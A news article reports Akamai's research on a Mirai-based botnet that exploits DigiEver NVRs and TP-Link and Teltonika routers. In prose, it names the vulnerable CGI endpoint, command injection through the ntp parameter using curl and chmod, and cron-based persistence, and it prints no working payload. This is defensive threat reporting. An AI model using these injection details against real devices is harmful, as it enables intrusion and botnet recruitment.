A new Mirai-based botnet exploits vulnerabilities in several devices, focusing on unpatched DigiEver DS-2105 Pro NVRs, dated firmware on TP-Link routers, and Teltonika RUT9XX routers. The campaign commenced in October, with active exploitation traced back as far as September. Akamai researchers have confirmed ongoing attacks, which leverage multiple remote code execution flaws to enlist devices into the botnet for malicious activities.
New Mirai botnet exploits vulnerabilities in various devices
The botnet targets a specific remote code execution (RCE) vulnerability in DigiEver NVRs, which involves improper input validation in the ‘/cgi-bin/cgi_main.cgi’ URI. Hackers can remotely inject commands such as ‘curl’ and ‘chmod’ through parameters like the ntp field in HTTP POST requests. Ta-Lun Yen from TXOne previously highlighted this vulnerability, noting its impact on various DVR devices during a presentation at the DefCamp security conference.
In addition to the DigiEver flaw, the Mirai variant also exploits CVE-2023-1389 in TP-Link devices and CVE-2018-17532 in Teltonika RUT9XX routers. Researchers have noted that while the attacks on DigiEver devices have been directly observed by Akamai, they reflect similar methods previously described by Yen. The exploitation of these flaws supports a campaign aiming to establish a foothold in vulnerable devices.
Using TP-Link? Here’s why the U.S. may ban your router
Methodology and techniques used by attackers
Through command injection, attackers can fetch malware binaries hosted on external servers, facilitating the addition of compromised devices to the botnet. Once under control, the devices can be utilized to launch distributed denial of service (DDoS) attacks or facilitate further attacks on other targets. Persistence within the infected systems is maintained by introducing cron jobs, which ensure that the malware remains active despite potential reboots or other interruptions.
Akamai’s findings highlight that this new Mirai variant features advanced encryption methods, including XOR and ChaCha20, indicating evolving tactics among botnet operators. Unlike many previous iterations of Mirai, which relied on basic string obfuscation, this variant showcases an intent to improve evasion and operational security. It targets a diverse range of architectures, including x86, ARM, and MIPS, broadening its potential impact across various device types.
Akamai researchers urge device owners and administrators to adopt proactive measures, including monitoring for indicators of compromise (IoC), that they have made available along with Yara rules for detecting and blocking the emerging threat.
Featured image credit: Kerem Gülen/Midjourney
